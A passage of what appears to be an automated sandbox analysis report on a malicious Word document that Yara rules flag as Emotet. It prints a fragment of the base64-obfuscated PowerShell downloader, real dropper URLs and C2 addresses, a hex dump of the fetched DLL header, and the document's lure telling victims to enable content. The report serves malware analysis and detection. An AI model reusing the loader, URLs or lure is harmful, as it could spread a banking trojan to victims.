AQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJ

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://3musketeersent.net/wp-includes/TUgD/Avira URL Cloud: Label: malware
                      Source: http://dashudance.com/thinkphp/dgs7Jm9/Avira URL Cloud: Label: malware
                      Source: http://shannared.com/content/lhALeS/Avira URL Cloud: Label: malware
                      Source: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/Avira URL Cloud: Label: malware
                      Source: http://leopardcranes.com/zynq-linux-yaayf/w/Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\Kaktksw\An6othh\N49I.dllReversingLabs: Detection: 54%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Arch_2021_717-1562532.docVirustotal: Detection: 16%Perma Link
                      Source: Arch_2021_717-1562532.docReversingLabs: Detection: 27%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\Kaktksw\An6othh\N49I.dllJoe Sandbox ML: detected

                      Compliance:

                      barindex
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2105632557.0000000002A50000.00000002.00000001.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: global trafficDNS query: name: shannared.com
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.169.223.13:80
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.169.223.13:80

                      Networking:

                      barindex
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmpString found in memory: http://shannared.com/content/lhALeS/!http://jeevanlic.com/wp-content/r8M/!http://dashudance.com/thinkphp/dgs7Jm9/!http://leopardcranes.com/zynq-linux-yaayf/w/!http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/!http://3musketeersent.net/wp-includes/TUgD/!https://skilmu.com/wp-admin/hQVlB8b/
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 51.255.203.164:8080
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 217.160.169.110:8080
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Tue, 26 Jan 2021 12:33:15 GMTContent-Disposition: attachment; filename="O9TGnKaUCw.dll"Content-Transfer-Encoding: binarySet-Cookie: 60100c0bb399f=1611664395; expires=Tue, 26-Jan-2021 12:34:15 GMT; Max-Age=60; path=/Last-Modified: Tue, 26 Jan 2021 12:33:15 GMTX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Type: application/octet-streamX-Cacheable: YES:ForcedContent-Length: 631808Accept-Ranges: bytesDate: Tue, 26 Jan 2021 12:33:15 GMTAge: 0Vary: User-AgentX-Cache: uncachedX-Cache-Hit: MISSX-Backend: all_requestsData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 30 06 00 00 70 03 00 00 00 00 00 bc 3e 06 00 00 10 00 00 00 40 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 ec 22 00 00 00 10 07 00 00 c6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 d4 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 e8 2e 06 00 00 10 00 00 00 30 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 cc 14 00 00 00 40 06 00 00 16 00 00 00 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 d1 0c 00 00 00 60 06 00 00 00 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 22 00 00 00 70 06 00 00 24 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d4 6e 00 00 00 a0 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*
                      Source: global trafficHTTP traffic detected: GET /content/lhALeS/ HTTP/1.1Host: shannared.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 84.232.229.24 84.232.229.24
                      Source: Joe Sandbox ViewIP Address: 192.169.223.13 192.169.223.13
                      Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewASN Name: RCS-RDS73-75DrStaicoviciRO RCS-RDS73-75DrStaicoviciRO
                      Source: global trafficHTTP traffic detected: POST /zrm2/7son14/mlqmfbi2uji6/ HTTP/1.1DNT: 0Referer: 217.160.169.110/zrm2/7son14/mlqmfbi2uji6/Content-Type: multipart/form-data; boundary=--------orf6DU5uUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 217.160.169.110:8080Content-Length: 5748Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B6528223-1CF8-4E74-AA78-05F4F57053A0}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /content/lhALeS/ HTTP/1.1Host: shannared.comConnection: Keep-Alive
                      Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: unknownDNS traffic detected: queries for: shannared.com
                      Source: unknownHTTP traffic detected: POST /zrm2/7son14/mlqmfbi2uji6/ HTTP/1.1DNT: 0Referer: 217.160.169.110/zrm2/7son14/mlqmfbi2uji6/Content-Type: multipart/form-data; boundary=--------orf6DU5uUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 217.160.169.110:8080Content-Length: 5748Connection: Keep-AliveCache-Control: no-cache
                      Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmpString found in binary or memory: http://3musketeersent.net/wp-includes/TUgD/
                      Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmpString found in binary or memory: http://dashudance.com/thinkphp/dgs7Jm9/
                      Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmpString found in binary or memory: http://jeevanlic.com/wp-content/r8M/
                      Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmpString found in binary or memory: http://leopardcranes.com/zynq-linux-yaayf/w/
                      Source: rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmpString found in binary or memory: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/
                      Source: powershell.exe, 00000005.00000002.2105195514.0000000002210000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2112633522.0000000002980000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2109838810.0000000003A46000.00000004.00000001.sdmpString found in binary or memory: http://shannared.com
                      Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmpString found in binary or memory: http://shannared.com/content/lhALeS/
                      Source: rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2105195514.0000000002210000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2112633522.0000000002980000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000005.00000002.2104262504.0000000000134000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                      Source: powershell.exe, 00000005.00000002.2104262504.0000000000134000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                      Source: rundll32.exe, 00000009.00000002.2112546062.0000000001F40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmpString found in binary or memory: https://skilmu.com/wp-admin/hQVlB8b/

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0000000B.00000002.2116581505.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2113422714.00000000003F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2113576039.0000000000780000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2108915228.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2120708575.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2120498924.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2109055699.0000000000710000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2124089879.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2350246723.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2111700747.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2108942082.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2126847598.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2125021450.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2113404333.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2350021887.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2124035115.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2124200175.0000000000760000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2126913357.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2107162967.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2116039169.0000000000170000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2125095238.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2120569228.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2111875145.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2127036397.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2112057590.0000000000340000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2124826552.0000000000170000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2349984443.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2116715619.0000000000430000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2106916506.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2106771774.0000000000160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 8.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.260000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.340000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.7d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.780000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.710000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.3f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.760000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.780000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.760000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.7d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.710000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.2b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.260000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.3f0000.0.raw.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I , Word
                      Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
                      Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I , Words: 8,758 I US I N@m 1
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Powershell drops PE fileShow sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Kaktksw\An6othh\N49I.dllJump to dropped file
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 5677
                      Source: unknownProcess created: Commandline size = 5576
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5576
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
